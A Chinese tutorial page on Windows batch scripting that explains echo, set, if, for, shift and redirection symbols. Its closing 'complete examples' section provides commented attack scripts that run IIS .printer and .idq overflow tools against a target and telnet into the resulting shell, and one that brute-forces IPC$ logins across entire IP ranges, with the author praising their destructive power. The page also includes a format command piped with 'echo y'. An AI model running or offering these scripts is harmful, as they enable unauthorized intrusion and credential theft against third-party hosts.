精华内容
下载资源
问答
  • Windows脚本编写

    千次阅读 2013-05-27 09:19:38
    一、关于脚本语言  脚本语言就是由专用解释器以行为单位解释执行的一种文本形式编程语言,象Windows的批处理、Unix/Linux的shell、perl和awk等脚本... 从广义上讲,Windows脚本一个比较大的概念,它包括了Jscri

    一、关于脚本语言

        脚本语言就是由专用解释器以行为单位解释执行的一种文本形式编程语言,象Windows的批处理、Unix/Linux的shell、perl和awk等脚本语言都属于这个范畴。它们大多都是由一个外壳(shell)来进行解释执行,只不过应用的范围和平台各有不同而已。

     

    二、关于Windows脚本

        从广义上讲,Windows脚本是一个比较大的概念,它包括了Jscript、VBScript、Windows脚本宿主、Windows脚本部件、远程脚本和Script控件等多种技术。

        狭义上来讲,Windows脚本就是我们平常所说的批处理。这里所说的Windows脚本也就是指这个概念,下面如无特殊说明都是指这个概念。

        Windows脚本形式上其实就是一个文本文件,后缀名为“.bat”,还可以是“.cmd”(.bat是DOS下的批处理文件,.cmd是NT内核命令行环境的另一种批处理文件)。这个文本文件的大部分内容其实就是一行一行的DOS命令,你可以使用任何文本编辑工具来进行创建和修改。除了DOS命令之外,Windows脚本还有一些自己专用的命令及语法,下面会涉及到。注意,在Windows脚本中,每一行只能写一个命令,就像我们平时在xp的cmd里一样,它只不过是将很多个命令按顺序逐一执行罢了。

        这里我觉得有必要指出,虽然我们平时在xp下直接双击Windows脚本就可以直接执行,但它并不是真正意义上的可执行文件,它本质上就是一个文本文件,之所以能直接运行,是因为我们双击Windows脚本的时候,操作系统已经自动将它关联到一个叫cmd.exe的可执行程序上了,cmd.exe会去将Windows脚本解析,并执行脚本中的命令.所以更准确的写法应该是将我们编写的Windows脚本作为一个参数传递给cmd.exe,这就是我们平时熟悉的命令行解释器。

     

    三、关于语法

        就像上面所讲的,Windows脚本是由DOS命令和一些Windows脚本专用的命令及语法组成的,所有的DOS命令都能在Windows脚本中使用,但有些Windows脚本专用的命令及语法却不能在命令行提示符中使用,比如goto语句,比如rem。至于语法规范,就是要求每一行智能机写一个命令,其它没什么了。

     

    四、关于命令

       说到底,这里最主要的东西还是那些脚本里面使用的命令,脚本的能力也主要取决于脚本中使用的命令。下面就列举一些Windows脚本中常用到的一些命令,更多命令的详细解释可以查阅Windows的帮助。

     

    echo

    说明:这个命令是用来在输出屏幕上显示你想要显示的信息。Echo on|off可以开启|关闭执行命令的同时在屏幕上显示命令本身的功能。

    用法:echo 想要显示的信息

    举例:echo ok

          执行这个命令之后,屏幕之上将显示ok这两个字符。

          set var=ok

          echo %var%

          顺序执行这两个命令之后,屏幕上将显示ok这两个字符。

     

    set

    说明:用来定义一个变量。

    用法:set [-参数] 变量名=变量值

    举例:set

          执行这个命令之后将显示当前环境下已经定义的所有变量,包括变量名和变量值。

          set /a test=10/2

          echo %test%

          将显示5。因为Windows脚本中所有的变量值默认的都是为字符串,所以如果想要在脚本程序中进行数值计算时,可以在set命令中带一个/a参数,这样在这条命令的赋值中可以进行数值计算。

     

          set /p test=

          #程序阻塞,等待用户输入一个字符串,回车之后继续执行,假设此时用户输入5

          echo %test%

          将显示5。set命令带/p参数则可以将用户的输入做为值赋值给定义的变量。

     

    @

    说明:严格意义上这并不是一个命令,只能算是Windows脚本中特有的一个标记,它加在一条命令的前面,用来屏蔽掉这条命令本身的显示。

    用法:@命令

    举例:@echo ok

          这条命令执行之后,屏幕上将显示ok这两个字符,但与之前的命令不同的是,它不会将echo ok这条命令本身在屏幕上显示出来。

     

    >&>>

    说明:输出重定向命令。将某个命令执行的结果显示重定向输出到指定的文件中,这样可以避免将执行结果的输出显示在执行窗口中。两个命令的区别之处在于>是覆盖原文件的所有内容,>>保留原文件的所有内容,只是将新内容追加在原文件的后面。

    用法:命令>文件名

          命令>>文件名

    举例:cd Temp

          dir>>d:/temp.txt

          将dir命令执行后的结果显示追加写入到temp.txt文件中,及将Temp目录下的所有文件和文件夹信息都写入到temp.txt文件中。注意,指定的文件可以不存在,命令会自动去创建以指定文件名为文件名的文件。

     

    rem

    说明:这也不是严格意义上的命令,相当于C语言中的#符号,是用来写注释的。

    用法:rem 注释

    举例:rem 这是一行注释

          rem说明这行不是一行有效的命令,只是注释,执行的时候会跳过这一行。

     

    pause

    说明:这个命令可以让程序暂停执行,并显示“请按任意键继续...”,用户按下任意一个键之后,程序将继续往下执行。

    用法:上一条命令

          pause

          下一条命令

    举例:echo ok

     

           pause

          echo hello

          执行完echo ok之后,程序将暂停下来,在屏幕上显示“请按任意键继续...”,用户按下任意一个键之后,程序将执行echo hello。

     

     

    第一部分:批处理的专用命令 

    批处理文件是将一系列命令按一定的顺序集合为一个可执行的文本文件,其扩展名为BAT。这些命令统称批处理命令,下面我就来给大家介绍一下批处理的命令。 
    1、 REM 
    REM 是个注释命令一般是用来给程序加上注解的,该命令后的内容在程序执行的时候将不会被显示和执行。例: 
    REM 你现在看到的就是注解,这一句将不会被执行。在以后的例子中解释的内容都REM 会放在REM后面。请大家注意。 

    2、 ECHO 
    ECHO 是一个回显命令主要参数有OFF和 ON,一般用ECHO message来显示一个特定的消息 。例: 
    Echo off 
    Rem 以上代表关闭回显即不显示所执行的命令 
    Echo 这个就是消息。 
    Rem 以上代表显示“这就是消息”这列字符 
    执行结果: 
    C://>ECHO.BAT 
    这个就是消息。 

    3、 GOTO 
    GOTO 即为跳转的意思。在批处理中允许以“:XXX”来构建一个标号然后用GOTO :标号直接来执行标号后的命令。例 
    :LABEL 
    REM 上面就是名为LABEL的标号。 
    DIR C:// 
    DIR D:// 
    GOTO LABEL 
    REM 以上程序跳转标号LABEL处继续执行。 

    4、CALL 
    CALL 命令可以在批处理执行过程中调用另一个批处理,当另一个批处理执行完后再继续执行原来的批处理。例: 
    批处理2.BAT内容如下: 
    ECHO 这就是2的内容 
    批处理1.BAT内容如下: 
    ECHO 这是1的内容 
    CALL 2.BAT 
    ECHO 1和2的内容全部显示完成 
    执行结果如下: 
    C://>1.BAT 
    这是1的内容 
    这就是2的内容 
    1和2的内容全部显示完成 

    5、PAUSE 
    PAUSE 停止系统命令的执行并显示下面的内容。例: 
    C://> PAUSE 
    请按任意键继续 . . . 

    6、 IF 
    IF 条件判断语句,语法格式如下: 
    IF [NOT] ERRORLEVEL number command 
    IF [NOT] string1==string2 command 
    IF [NOT] EXIST filename command 
    说明: 
    [NOT] 将返回的结果取反值即“如果没有”的意思。 
    ERRORLEVEL 是命令执行完成后返回的退出值 
    Number 退出值的数字取值范围0~255。判断时值的排列顺序应该又大到小。返回的值大于或等于指定的值时条件成立。 
    string1==string2 string1和string2都为字符的数据,英文字符的大小写将看做不同,这个条件中的等于号必须是2个(绝对相等),条件想等后即执行后面的 command 
    EXIST filename 为文件或目录存在的意思。 
    IF ERRORLEVEL这条语句必须放在某一个命令后面。执行命令后由IF ERRORLEVEL来判断命令的返回值。 
    例: 
    1、 IF [NOT] ERRORLEVEL number command 
    检测命令执行完后的返回值做出判断。 
    echo off 
    dir z: 
    rem 如果退出代码为1(不成功)就跳至标题1处执行 
    IF ERRORLEVEL 1 goto 1 
    rem 如果退出代码为0(成功)就跳至标题0处执行 
    IF ERRORLEVEL 0 goto 0 
    :0 
    echo 命令执行成功! 
    Rem 程序执行完毕跳至标题exit处退出 
    goto exit 
    :1 
    echo 命令执行失败! 
    Rem 程序执行完毕跳至标题exit处退出 
    goto exit 
    :exit 
    Rem 这里是程序的出口 
    2、 IF string1==string2 command 
    检测当前变量的值做出判断 
    ECHO OFF 
    IF %1==2 goto no 
    Echo 变量相等! 
    Goto exit 
    :no 
    echo 变量不相等 
    goto exit 
    :exit 
    大家可以这样看效果 C://>test.bat 数字 

    3、 IF [NOT] EXIST filename command 
    发现特定的文件做出判断 
    echo off 
    IF not EXIST autoexec.bat goto 1 
    echo 文件存在成功! 
    goto exit 
    :1 
    echo 文件不存在失败! 
    goto exit 
    :exit 
    这个批处理大家可以放在c盘和d盘分别执行看看效果。 
    7、 FOR 
    FOR这个命令比较特殊是一个循环执行命令的命令,同时FOR的循环里面还可以套用FOR在进行循环。这篇我们介绍基本的用法就不做套用的循环了,后面再来讲解套用的循环。在批处理中FOR的命令如下: 
    FOR [%%c] IN (set) DO [command] [arguments] 
    在命令行中命令如下: 
    FOR [%c] IN (set) DO [command] [arguments] 
    常用参数: 
    /L 该集表示以增量形式从开始到结束的一个数字序列。因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生序列 (5 4 3 2 1)。 
    /D 如果集中包含通配符,则指定与目录名匹配,而不与文件名匹配。 

    /F 从指定的文件中读取数据作为变量 
    eol=c - 指一个行注释字符的结尾(就一个) 
    skip=n - 指在文件开始时忽略的行数。 
    delims=xxx - 指分隔符集。这个替换了空格和跳格键的默认分隔符集。 
    tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的分配。m-n格式为一个范围。通过 nth 符号指定 mth。如果符号字符串中的最后一个字符星号,那么额外的变量将在最后一个符号解析之后分配并接受行的保留文本。 
    usebackq - 指定新语法已在下类情况中使用:在作为命令执行一个后引号的字符串并且一个单引号字符为文字字符串命令并允许在 filenameset中使用双引号扩起文件名称。 
    下面来看一个例子: 
    FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do @echo %i %j %k 
    会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或空格定界符号。请注意,这个 for 程序体的语句引用 %i 来取得第二个符号,引用 %j 来取得第三个符号,引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名,您需要用双引号将文件名括起来。为了用这种方式来使用双引号,您还需要使用 usebackq 选项,否则,双引号会被理解成是用作定义某个要分析的字符串的。 
    %i 专门在 for 语句中得到说明,%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens= 一行指定最多 26 个符号,只要不试图说明一个高于字母 /'z/' 或/'Z/' 的变量。请记住,FOR 变量名分大小写,是通用的;而且,同时不能有 52 个以上都在使用中。 
    您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,用单引号将括号之间的 filenameset 括起来。这样,该字符串会被当作一个文件中的一个单一输入行。最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将括号之间的 filenameset 变成一个反括字符串。该字符串会被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进内存,并被当作文件分析。因此,以下例子: 
    FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i 
    会枚举当前环境中的环境变量名称。 
    以下列举一个简单的例子,他将说明参数/L和没有参数的区别: 
    删除文件1.TXT 2.TXT 3.TXT 4.TXT 5.TXT 
    例: 
    ECHO OFF 
    FOR /L %%F IN (1,1,5) DO DEL %%F.TXT 
    或 
    FOR %%F IN (1,2,3,4,5) DO DEL %%F.TXT 
    以上2条命令执行的结果都是一样的如下: 
    C://>DEL 1.TXT 
    C://>DEL 2.TXT 
    C://>DEL 3.TXT 
    C://>DEL 4.TXT 
    C://>DEL 5.TXT 

    8、 SETLOCAL 
    开始批处理文件中环境改动的本地化操作。在执行 SETLOCAL 之后 
    所做的环境改动只限于批处理文件。要还原原先的设置,必须执 
    行 ENDLOCAL。 达到批处理文件结尾时,对于该批处理文件的每个 
    尚未执行的 SETLOCAL 命令,都会有一个隐含的 ENDLOCAL 被 
    执行。例: 
    @ECHO OFF 
    SET PATH /*察看环境变量PATH 
    PAUSE 
    SETLOCAL 
    SET PATH=E://TOOLS /*重新设置环境变量PATH 
    SET PATH 
    PAUSE 
    ENDLOCAL 
    SET PATH 
    从上例我们可以看到环境变量PATH第1次被显示得时候是系统默认路径。被设置成了E://TOOLS后显示为E://TOOLS但当ENDLOCAL后我们可以看到他又被还原成了系统的默认路径。但这个设置只在该批处理运行的时候有作用。当批处理运行完成后环境变量PATH将会还原。 

    9、 SHIFT 
    SHIFT命令可以让在命令上的的命令使用超过10个(%0~%9)以上的可替代参数例: 
    ECHO OFF 
    ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 
    SHIFT 
    ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 
    SHIFT 
    ECHO %1 %2 %3 %4 %5 %6 %7 %8 %9 
    执行结果如下: 
    C:://>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 
    1 2 3 4 5 6 7 8 9 
    2 3 4 5 6 7 8 9 10 
    3 4 5 6 7 8 9 10 11 
    以上就是基于WIN2000下的9个批处理命令。 

    第二部分:特殊的符号与批处理 

    在命令行下有些符号是不允许使用的但有些符号却有着特殊的意义。 
    1、 符号(@) 
    @在批处理中的意思是关闭当前行的回显。我们从上面知道用命令echo off可以关掉整个批处理的命令回显但却不能不显示echo off这个命令。现在我们在这个命令前加上@这样echo off这一命令就被@关闭了回显从而达到所有命令均不回显得要求 
    2、 符号(>) 
    >的意思是传递并覆盖。他所起的作用是将运行后的回显结果传递到后面的范围(后面可是文件也可是默认的系统控制台)例: 
    文件1.txt的文件内容为: 
    1+1 
    使用命令c://>dir *.txt >1.txt 
    这时候1.txt的内容如下 
    驱动器 C 中的卷没有标签。 
    卷的序列号是 301A-1508 
    C:// 的目录 
    2003-03-11 14:04 1,005 FRUNLOG.TXT 
    2003-04-04 16:38 18,598,494 log.txt 
    2003-04-04 17:02 5 1.txt 
    2003-03-12 11:43 0 aierrorlog.txt 
    2003-03-30 00:35 30,571 202.108.txt 
    5 个文件 18,630,070 字节 
    0 个目录 1,191,542,784 可用字节 
    >将命令执行的结果覆盖了原始的文件内容。 
    在传递给控制台的时候程序将不会有任何回显(注意:这里的回显跟echo off关掉的回显不是同一概念。Echo off关掉的是输入命令的回显,这里的回显是程序执行中或后的回显)例: 
    C://>dir *.txt >nul 
    程序将没有任何显示也不会产生任何痕迹。 
    3、 符号(>>) 
    符号>>的作用与符号>相似,但他们的区别在于>>是传递并在文件末尾追加>>也可将回显传递给控制台(用法同上)例: 
    文件1.txt内同为: 
    1+1 
    使用命令c://>dir *.txt >>1.txt 
    这时候1.txt的内容如下 
    1+1 
    驱动器 C 中的卷没有标签。 
    卷的序列号是 301A-1508 
    C:// 的目录 
    2003-03-11 14:04 1,005 FRUNLOG.TXT 
    2003-04-04 16:38 18,598,494 log.txt 
    2003-04-04 17:02 5 1.txt 
    2003-03-12 11:43 0 aierrorlog.txt 
    2003-03-30 00:35 30,571 202.108.txt 
    5 个文件 18,630,070 字节 
    0 个目录 1,191,542,784 可用字节 
    >>将命令执行的结果覆加在了原始的文件内容后面。 
    4、 符号(|) 
    |是一个管道传输命令意思是将上一命令执行的结果传递给下一命令去处理。例: 
    C://>dir c://|find "1508" 
    卷的序列号是 301A-1508 
    以上命令的意思为查找c://的所有并发现1508字符串。Find的用法请用 find /?自行查看 
    在不使用format的自动格式化参数的时候我是这样来自动格式化盘片的 
    echo y|fornat a: /s /q /v:system 
    用过format命令的人都知道format有一个交互对化过程,要使用者输入y来确定当前的命令是否被执行。在这个命令前加上echo y并用管道传输符|将echo执行的结果y传递给format从而达到手工输入y的目的(这条命令有危害性,测试的时候请谨慎) 
    5、 符号(^) 
    ^ 是对特殊符号 > 、<、 &、的前导字符。在命令中他将以上的3个符号的特殊动能去掉仅仅只吧他们当成符号而不使用他们的特殊意义。例: 
    c://>echo test ^> 1.txt 
    test > 1.txt 
    从上面可以看出并没有把test写入文件1.txt而是将test >1.txt 当字符串显示了出来。这个符号在远程构建批处理的时候很有效果。 
    6、 符号(&) 
    &符号允许在一行中使用2个以上不同的命令,当第一个命令执行失败将不影响第2个命令的执行。例: 
    c://> dir z:// &dir y:// &dir c:// 
    以上的命令将会连续显示z: y: c:盘内的内容不理会该盘符是否存在。 
    7、 符号(&&) 
    &&符号也是允许在一行中使用2个以上不同的命令,当第一个命令执行失败后后续的命令将不会再被执行。例: 
    c://> dir z:// &&dir y:// &&dir c:// 
    以上的命令将会提示检查是否存在z:盘如果存在则执行,如果不存在则停止执行所有的后续命令 
    8、 符号(" ") 
    " "符号允许在字符串中包含空格。进入一个特殊的目录可以用如下方法例: 
    c://>cd “Program Files” 
    c://>cd progra~1 
    c://>cd pro* 
    以上方法都可以进入Program Files目录 
    9、 符号(,) 
    ,符号相当于空格。在某些特殊的情况下可以用,来代替空格使用。例: 
    c://>dir,c:// 
    10、 符号(;) 
    ;符号当命令相同的时候可以将不同的目标用;隔离开来但执行效果不变。如执行过程中发生错误则只返回错误报告但程序还是会继续执行。例: 
    DIR C://;D://;E://F:// 
    以上的命令相当于 
    DIR C:// 
    DIR D:// 
    DIR E:// 
    DIR F:// 
    当然还有些特殊的符号但他们的使用范围很小我就不再这里一一的说明了。 

    第三部分:批处理与变量 

    在批处理中适当的引用变量将会使你所编制的程序应用面更广。批处理每次能处理的变量从%0~%9共10个。其中%0默认给批处理的文件名使用。除非在使用SHIFT命令后%0才能被%1所替代。引用shift命令的例子如果把%1前面多加上一个%0那么结果如下: 
    C:://>SHIFT.BAT 1 2 3 4 5 6 7 8 9 10 11 
    SHIFT.BAT 1 2 3 4 5 6 7 8 9 
    1 2 3 4 5 6 7 8 9 10 
    2 3 4 5 6 7 8 9 10 11 
    系统是如何区分每个变量的呢,系统区分变量的规则为字符串中间的空格,即只要发现空格就把空格前面的字符当作一个变量而空格后面的字符则作为另一个变量。如果你的变量是一个当中包含空格的长目录名这时候你需要用上一节特殊符号8中所用的引号将他圈起来。例: 
    批处理内容为: 
    ECHO %1 
    ECHO %2 
    ECHO %3 
    输入命令: 
    C://>TEST “Program Files” Program Files 
    Program Files 
    Program 
    Files 
    在一个复杂的批处理中又可能同时使用的变量会超过10个这时候会和系统的规则想冲突那么这个问题怎么解决呢?在系统中还有一种变量称之为环境变量(使用SET命令可以查看当前系统的环境变量)如当前系统目录是%windir%或%SystemRoot%等。当同时使用的参数超过10个的时候,我们可以把某些在后面的程序中还要调用的变量保存为环境变量。具体用法如 SET A=%1 这样我们就命名了一个新的环境变量A 在调用变量A的时候要%A%这样调用,环境变量不受SHIFT命令影响。如果要改变一个环境变量需要重新对其设置才能改变。当然也可以进行变量与变量之间的传递来达到目的。下面我们来看一个例子,批处理如下: 
    ECHO OFF 
    SET PASS=%1 
    SHIFT 
    SET PASS1=%1 
    SHIFT 
    ECHO %PASS% %PASS1% %1 %2 %3 %4 %5 %6 %7 %8 %9 
    SHIFT 
    ECHO %PASS% %PASS1% %9 
    SET PASS=%PASS1% 变量的传递 
    SET PASS1=%9 
    SHIFT 
    ECHO %PASS% %PASS1% %9 
    使用命令:C://>TEST A B 3 4 5 6 7 8 9 10 K L 
    A B 3 4 5 6 7 8 9 10 K 注意:这一行显示了11个变量 
    A B L 在使用了3次SHIFT之后%9变成了L 
    B L 变量的传递后的结果 

    -- 作者:hamgbbg 
    -- 发布时间:2006-5-24 16:50:27 
    -- 
    第四部分:完整案例 

    以上就是批处理的一些用法。现在我们把这些用法结合起来详细的分析一下目前网上发布的一些批处理,看看他们是怎么运作的。这里我将列举三个例子来详细分析,为了保持程序的完整我的注释会加在/*后面。 
    例一 
    这个例子是利用iis5hack.exe对有.printer漏洞的主机进行溢出的批处理。用到的程序有iis5hack.exe和系统自带的telnet.exe。iis5hack的命令格式为: 
    iis5hack <目标ip> <目标端口> <目标版本> <溢出连接端口>目标版本为0-9这10个数字分别对应不同语言版本和sp的系统版本,我们编制的批处理使用的命令格式为 开始版本号可有可无。程序如下。 
    @echo off /*关闭命令回显 
    if "%1%"=="" goto help /*判断%1是否为空,%1为目标ip 
    if "%2%"=="1" goto 1 /*判断%2是否为1,为1则跳转标志1 
    if "%2%"=="2" goto 2 /*%2为开始版本号,如果没有设置则 
    if "%2%"=="3" goto 3 /*如果存在则从匹配的地方开始执行 
    if "%2%"=="4" goto 4 
    if "%2%"=="5" goto 5 
    if "%2%"=="6" goto 6 
    if "%2%"=="7" goto 7 
    if "%2%"=="8" goto 8 
    if not EXIST iis5hack.exe goto file /*没有发现iis5hack.exe就执行标志file段内容 
    ping %1 -n 1 | find "Received = 1" /*ping目标1次,从结果中发现Received = 1 
    if errorlevel 1 goto error /*如果返回代码为1则执行error段(代码1为没有发现 0为发现并成功执行) 
    iis5hack %1 80 9 88 | find "good" /*开始溢出目标端口80 系统代码9 溢出后连接端口88 在执行结果中发现字符串”good”(溢出成功后才会有字符串good) 
    if not errorlevel 1 goto telnet /*如果没有错误代码1(溢出成功)就执行telnet段的内容。 
    echo 操作系统类型 9 失败! /否则显示这一句 
    :8 /*以下代码内容参照上面 
    iis5hack %1 80 8 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 8 失败! 
    :7 
    iis5hack %1 80 7 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 7 失败! 
    :6 
    iis5hack %1 80 6 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 6 失败! 
    :5 
    iis5hack %1 80 5 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 5 失败! 
    :4 
    iis5hack %1 80 4 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 4 失败! 
    :3 
    iis5hack %1 80 3 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 3 失败! 
    :2 
    iis5hack %1 80 2 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 2 失败! 
    :1 
    iis5hack %1 80 1 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 1 失败! 
    :0 
    iis5hack %1 80 0 88 | find "good" 
    if not errorlevel 1 goto telnet 
    echo 操作系统类型 0 失败! 
    goto error 
    :telnet 
    telnet %1 88 /*开始连接目标ip的88端口 
    goto exit /*连接中断后跳转exit段 
    :error /*error段显示错误后的帮助信息 
    echo 可能网络不能连接或者对方以修补该漏洞!请按照下面的格式手工尝试一次! 
    echo iis5hack [目标IP] [WEB端口] [系统类型] [开放端口] 
    ECHO 中文: 0 
    ECHO 中文+sp1: 1 
    ECHO 英文: 2 
    ECHO 英文+sp1: 3 
    ECHO 日语: 4 
    ECHO 日语+sp1: 5 
    ECHO 韩文: 6 
    ECHO 韩文+sp1: 7 
    ECHO 墨西哥语: 8 
    ECHO 墨西哥语+sp1: 9 
    goto exit /*跳转exit段 
    :file /*file段显示文件没有发现的信息 
    echo 文件iis5hack.exe没有发现!程序终止运行! 
    goto exit /*跳转exit段 
    :help /*help段显示本批处理的使用格式帮助 
    echo 本程序用法如下: 
    echo iis [目标ip] 
    echo iis [目标ip] [开始的号码9-0] 
    :exit /*exit段为程序出口 
    这个批处理基本没有什么循环只是一路走下来。所以代码比较长难度不大! 
    例二 
    这个例子是用iisidq.exe对有idq漏洞的机器进行溢出的批处理。使用的程序有iisidq.exe和系统自带的程序telnet.exe。iisidq.exe的用法如下: 
    运行参数: 操作系统类型 目的地址 web端口 1 溢出监听端口 <输入命令1> 
    其中,如果输入命令参数没有输入,那么,默认为:"cmd.exe"。 
    其中操作系统类型类型的代码范围是0-14。我们编制的批处理使用的命令格式为 程序如下: 
    @echo off /*同例一 
    if not EXIST iisidq.exe goto file /*同例一 
    if %1 == "" goto error /*同例一 
    ping %1 -n 1 | find "Received = 1" /*同例一 
    if errorlevel 1 goto error1 /*同例一 
    set b=%1 /*创建一个环境变量b,将变量%1的内容传递给环境变量b。变量b的内容以后将是目标ip 
    set a=0 /*创建一个环境变量a并指定环境变量a为0。由于使用整个批处理的循环所以用a来做计数器。 
    :no /*no段开始 
    if %a%==0 set d=0 /*如果环境变量a=0则创建环境变量d设定环境变量d=0。 
    if %a%==1 set d=1 /*环境变量d其实是操作系统类型代码,用计数器来控制其 
    if %a%==2 set d=2 /*变动。 
    if %a%==3 set d=3 
    if %a%==4 set d=4 
    if %a%==5 set d=5 
    if %a%==6 set d=6 
    if %a%==7 set d=7 
    if %a%==9 set d=9 
    if %a%==10 set d=13 
    if %a%==11 set d=14 
    goto 0 /*变量传递完成后转到标志0处运行 
    :1 
    echo 正在执行第%d%项!与目标%b%不能连接!正在尝试连接请等候...... 
    :0 /*标志0开始 
    IISIDQ %d% %b% 80 1 99 |find "good" /*按格式发送溢出命令并在结果中发现字符串good(发送代码成功才会有字符串good) 
    if errorlevel 1 goto 1 /*如果没有good字符串则没有发送成跳 
    /*转标志1处继续尝试发送 
    ping 127.0.0.1 -n 8 >nul /*ping自己8次相当于延时8秒不显示执 
    /*行结果 
    echo 正在执行第%d%项! /*报告正在溢出的操作系统类型 
    telnet %b% 99 /*连接溢出端口 
    echo. /*显示一个空行 
    if %d%==14 goto error1 /*如果操作系统类型为14则跳转error1处(循环出口) 
    if %d%==13 set a=11 /*开始用计数器对操作系统代码重新附值 
    if %d%==9 set a=10 
    if %d%==7 set a=9 
    if %d%==6 set a=7 
    if %d%==5 set a=6 
    if %d%==4 set a=5 
    if %d%==3 set a=4 
    if %d%==2 set a=3 
    if %d%==1 set a=2 
    if %d%==0 set a=1 
    goto no /*附值完成跳转no段执行 
    :file /*以下都是出错后的帮助提示 
    echo IIsidq.exe没有发现!将该文件和本文件放在同一目录! 
    goto exit 
    :error 
    echo 错误!目标ip不可识别!请使用下面的格式连接! 
    echo idq [目标IP] 
    goto exit 
    :error1 
    echo 连接没有成功!可能目标机器已经修补了该漏洞或者网络故障所至! 
    echo 请按照下面的格式手工尝试! 
    echo iisidq [目标类型] [目标IP] [目标端口] [连接方式] [溢出端口] 
    echo telnet [目标ip] [溢出端口] 
    :exit /*整个程序的出口 
    这个批处理采用的整体循环掌握好计数器部分就掌握了这个批处理。 
    例三 
    for /l %%a in (0,1,255) do for /l %%b in (0,1,255) do for /l %%c in (1,1,254) do for /f "tokens=1,2*" %%e in (userpass.txt) do net use %1.%%a.%%b.%%c//ipc$ %%e /u:%%f 
    上面的命令为1条命令。大家可以看出该命令使用了4个FOR来套用的。用法为:C://>TEST.BAT 218 当输入218回车后该命令会由第1个for取初始值0为%%a然后继续取第2个for的初始值0为%%b继续取第3个for的初始值1为%%c最后一个for是将userpass.txt中的第一段字符作为密码%%e第二段字符作为用户名%%f最后执行命令 (这里我把上面的值都带进去,设密码为123 用户名为 abc) 
    net usr 218.0.0.1//ipc$ 123 /u:abc 
    当然上面这个例子可能有些朋友会说太简单并且太死板不灵活。我把这个例子做了些修改(完整文件见光盘ipc.bat)由兴趣的朋友可以自己看看。修改后的程序可以灵活的查找你指定开始到结束或你指定开始到最大ip的范围。当然功能还可以在加强,至于能加强到什么地步能不能成为一个新的工具那就是你的事了。 
    这个的循环动作大了点主要是ip的数字替换麻烦所以没办法。这个批处理我就不写注释了,大家好好的参考上面的内容你会很快看懂这个批处理的。看懂了得不要说简单哦!最起码这是个没有使用任何第三方工具就能探测并保存弱口令的批处理了!!简单的改一改杀伤力还是很大的。以上这些批处理全部在win2000和xp下测试通过最大的优点就是只有一个批处理文件并且绝对不会误报。缺点就是太长! 

     

     

     

     

    展开全文
  • windows脚本命令编写

    千次阅读 2019-03-22 11:35:57
    简单批处理内部命令简介 ...cmd文件只有在windows2000以上的系统中才能运行,而bat文件则没有这限制 echo 命令 打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前...

    简单批处理内部命令简介

    cmd文件和bat文件的区别:在本质上两者没有区别,都是简单的文本编码方式,都可以用记事本创建、编辑和查看。两者所用的命令行代码也是共用的,只是cmd文件中允许使用的命令要比bat文件多。cmd文件只有在windows2000以上的系统中才能运行,而bat文件则没有这个限制

    • echo 命令
      打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。

    在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

    c:>dir *.txt > 1.txt

    c:>dir *.txt >> 1.txt

    • @ 命令
      表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
    • rem 命令
      注释命令,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。
    • pause 命令
      运行 Pause 命令时,将显示下面的消息:
      Press any key to continue . . .
    • start 命令
      启动单独的“命令提示符”窗口来运行指定程序或命令。如果在没有参数的情况下使用,start 将打开第二个命令提示符窗口。
    • choice 命令
      choice 使用此命令可以让用户输入一个字符,从而运行不同的命令
    • If 命令
      表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
      1、if “参数” == “字符串”  待执行的命令
      参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
      2、if exist 文件名  待执行的命令
      如果有指定的文件,则条件成立,运行命令,否则运行下一句
      如if exist config.sys edit config.sys
      3、if errorlevel / if not errorlevel 数字  待执行的命令
      如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
      如if errorlevel 2 goto x2  
      DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。
    • for 命令
      FOR这条命令基本上都被用来处理文本,但还有其他一些好用的功能!
    展开全文
  • Windows脚本 - Bat批处理命令使用教程

    千次阅读 2010-10-28 15:57:00
     照我的理解,批处理的本质,是一堆DOS命令按一定顺序排列而形成的集合。  OK,never claver and get to business(闲话少说...批处理有一个很鲜明的特点:使用方便、灵活,功能强大,自动化程度高

         照我的理解,批处理的本质,是一堆DOS命令按一定顺序排列而形成的集合。

